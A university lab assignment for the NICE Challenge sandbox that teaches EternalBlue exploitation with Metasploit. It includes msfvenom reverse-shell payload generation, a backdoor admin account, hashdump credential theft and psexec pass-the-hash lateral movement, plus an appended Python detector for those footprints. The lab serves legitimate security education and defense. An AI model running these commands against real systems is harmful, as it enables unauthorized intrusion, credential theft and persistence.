Lab 9 - NICE Challenge - Professor Shafer Special
In this lab you are going to use Metasploit to target systems running Microsoft Windows.
- Environment: Pretty Safe Electronics
- Challenge Title: Unauthorized Activity Alert (or any challenge in the PSE environment)
- Access via https://portal.nice-challenge.com/
In this lab, you're going to use the NICE Challenge ecosystem and its virtual machines, but Professor Shafer has gone completely off the rails and written a new assignment using the "Pretty Safe Electronics" network. Ignore the NICE challenge self-tests and ignore the NICE submission system - submit this assignment through Canvas.
Part 1 - Scanning
Log onto the Security-Desk system. It's Kali Linux, just an older release than what you have installed on your own computer.
Do an nmap scan of the domain controller ("AD-Server", short for Active Directory Server, on the network map) from within Metasploit. Tell nmap to include all the details and tests in its scanning. What command do you use?
- What nmap command do you use to scan the domain controller?
- From the 'hosts' view of Metasploit, what is the hostname of the domain controller?
- From the 'services' view of Metasploit, what version of SSH is the domain controller running? (Include the protocol part too)
- From the 'services' view of Metasploit, what version of Windows is the domain controller running? (Include the Release and Build part)
Part 2 - Exploit
Search for exploits related to the eternalblue exploit, which is effective on many (unpatched) versions of Windows.
msf6> search eternalblue
Metasploit has a scanner for eternalblue. Let's use that first.
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> info
msf6> options
msf6> set RHOSTS 172.16.30.55   # RHOSTS, plural, because it could scan many hosts
msf6> exploit                   # Scanner will run and report results
Ah, a vulnerability was found! Let's use the eternalblue exploit, then.
Based on the instructions in "How to Exploit Eternalblue to get a Meterpreter Session on Windows Server 2012 R2".
Download eternalblue8_exploit.py from https://gist.github.com/worawit (just use the web browser on Security-Desk).
Download the eternalblue kernel shellcode, eternalblue_x64_kshellcode.asm, from https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm (just use the web browser on Security-Desk).
Assemble the kernel shellcode (transform the raw assembly code into binary machine code)
$ nasm -f bin eternalblue_x64_kshellcode.asm
Generate a userland shell payload using msfvenom. Note that LHOST and LPORT point to the Security-Desk machine; it's the "local" machine from the perspective of the exploit.
$ msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=172.16.20.55 LPORT=4444
Combine the kernel and userland shellcode
$ cat eternalblue_x64_kshellcode shell_msf.bin > reverse_shell.bin
Set up Metasploit to receive the meterpreter shell as soon as it is running
msf6> use exploit/multi/handler
msf6> set PAYLOAD windows/x64/shell/reverse_tcp
msf6> set LHOST 172.16.20.55   # IP of Security-Desk, which will listen
msf6> set LPORT 4444
msf6> exploit -j               # Run exploit handler as a background job
### Leave this running and waiting
Install the Impacket utility that the exploit needs to function
# Need to install impacket on Python 2.7, but pip is not installed for that Python version. (System pip is for Python 3.x)
# First install pip, then upgrade the setup tools, then finally install impacket
$ wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
$ sudo python get-pip.py
$ sudo python -m pip install --upgrade setuptools
$ sudo python -m pip install impacket
Run the exploit
$ python eternalblue8_exploit.py 172.16.30.55 reverse_shell.bin 500
What sessions have been created?
msf6> sessions
msf6> sessions -i <num>   # where <num> = Number of session that just opened
- Upload a screenshot showing your active shell on the Domain Controller
Part 3 - Post-Exploit
Now that you have initial access to the system, take advantage of it.
- What user are you on the domain controller? Use the
- Create a new account on the domain controller with username "evilhacker" and password "pwned". What command did you enter at the shell to accomplish this?
- Elevate that "evilhacker" user to the administrator group. What command did you enter at the shell to accomplish this?
- Obtain a list of users on the domain controller at the command line. Upload a screenshot where 'evilhacker' is visible
- Back in the NICE webportal, launch the remote desktop interface to the domain controller. Log in as 'evilhacker' and provide a screenshot showing 'evilhacker' as your current username as proof of work.
Switch back to the Security-Desk and Metasploit now. Background the running shell (exploit) with CTRL-Z, then enter y when prompted to "Background session?"
Now upgrade your shell to Meterpreter.
msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter
msf6> options
msf6> set SESSION <num>   # Where <num> is the session you JUST backgrounded
msf6> exploit             # Should see "Meterpreter session <num> opened"
msf6> sessions
Take a screenshot at this point as a deliverable.
Connect to that active Meterpreter session on the domain controller.
msf6> sessions -i <num>   # Where <num> is the NEW meterpreter session
There are lots of fun things to do here!
meterpreter> sysinfo          # Where am I running? Should be the domain controller
meterpreter> getprivs         # See what permissions we have
meterpreter> ps               # Process list
meterpreter> getsystem        # Ensure we're escalated to SYSTEM access, if not already
meterpreter> migrate <pid>    # Migrate to another process - Look for vds.exe and use its PID
meterpreter> hashdump
These password hashes are perfect for brute forcing, and are also useful for Windows pass-the-hash attacks (where you don't need the original password, just the hash will suffice).
- Submit a screenshot showing both your original shell session and new Meterpreter session active. (Use the sessions command in Metasploit)
- Submit a screenshot showing the password hashes that exist on the domain controller. (Use the hashdump command in Meterpreter)
- What is the full hash for UID 500 (the original administrator)? Provide the entire line you get from hashdump.
Tip: Rather than manually typing it out (error-prone), use the https://cl1p.net website for a basic clipboard between the NICE VM and whatever system you are completing this Canvas assignment on.
Background the meterpreter shell on the domain controller:
Part 4 - Pass-the-Hash
Let's use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute force the password plaintext. This is a "feature" of older versions of Windows.
msf6> use exploit/windows/smb/psexec
msf6> set RHOST 172.16.30.88   # The DATABASE host
msf6> set SMBUser Administrator
msf6> set SMBPass TheHashedPassword
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 172.16.20.55   # Security-Desk
msf6> set LPORT 4445           # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller
msf6> exploit -j
msf6> sessions
- Submit a screenshot showing all three sessions active. (The original shell to the domain controller, the Meterpreter shell to the domain controller, and the Meterpreter shell to the database).
- Submit a screenshot showing the output of sysinfo on the database.
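As an added defender-side example (not part of the lab or the NICE challenge), the following Python flags the two footprints this lab leaves on the targets: the account creation followed by a privileged-group addition from Part 3, and the NTLM network logon followed by a new service install that psexec-style lateral movement produces in Part 4. The Windows event IDs are real; the event records, the host names, the timestamps and the service name are constructed for the example.

```python
# Added example, not the lab's own material: correlate Windows Security/System
# events for the Part 3 (4720 -> 4728/4732) and Part 4 (4624 NTLM type 3 -> 7045)
# activity. All records below are constructed sample data, normalised as dicts.
from datetime import datetime, timedelta

EVENTS = [
    {"ts": "2024-05-01T09:00:00", "host": "AD-Server", "id": 4720, "target": "svc_backup", "subject": "helpdesk"},
    {"ts": "2024-05-01T10:00:05", "host": "AD-Server", "id": 4720, "target": "evilhacker", "subject": "SYSTEM"},
    {"ts": "2024-05-01T10:00:40", "host": "AD-Server", "id": 4732, "target": "evilhacker", "group": "Administrators"},
    {"ts": "2024-05-01T10:15:00", "host": "DATABASE", "id": 4624, "target": "Administrator",
     "logon_type": 3, "auth": "NTLM", "src_ip": "172.16.20.55"},
    {"ts": "2024-05-01T10:15:02", "host": "DATABASE", "id": 7045, "service": "XkQzTrWa",
     "image": "%SYSTEMROOT%\\XkQzTrWa.exe"},  # constructed random-looking service name
]

PRIV_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}
WINDOW = timedelta(minutes=5)  # correlation window, an assumption for this example


def ts(event):
    """Parse the ISO-8601 timestamp of a normalised event record."""
    return datetime.fromisoformat(event["ts"])


def find_created_then_elevated(events):
    """Accounts added to a privileged group within WINDOW of their creation.
    4720 = user account created; 4728/4732 = member added to a security-enabled group."""
    created, hits = {}, []
    for e in sorted(events, key=ts):
        if e["id"] == 4720:
            created[(e["host"], e["target"])] = ts(e)
        elif e["id"] in (4728, 4732) and e.get("group") in PRIV_GROUPS:
            t0 = created.get((e["host"], e["target"]))
            if t0 is not None and ts(e) - t0 <= WINDOW:
                hits.append((e["host"], e["target"], e["group"]))
    return hits


def find_psexec_style_lateral(events):
    """Hosts where a network NTLM logon (4624, logon type 3) is followed within
    WINDOW by a new service installation (7045), the classic psexec pattern."""
    hits = []
    logons = [e for e in events if e["id"] == 4624 and e.get("logon_type") == 3 and e.get("auth") == "NTLM"]
    for svc in (e for e in events if e["id"] == 7045):
        for lg in logons:
            if lg["host"] == svc["host"] and timedelta(0) <= ts(svc) - ts(lg) <= WINDOW:
                hits.append((svc["host"], lg["src_ip"], lg["target"], svc["service"]))
    return hits


if __name__ == "__main__":
    print(find_created_then_elevated(EVENTS))
    print(find_psexec_style_lateral(EVENTS))
```

The svc_backup record is included to show that an ordinary account creation with no privileged-group addition is not flagged.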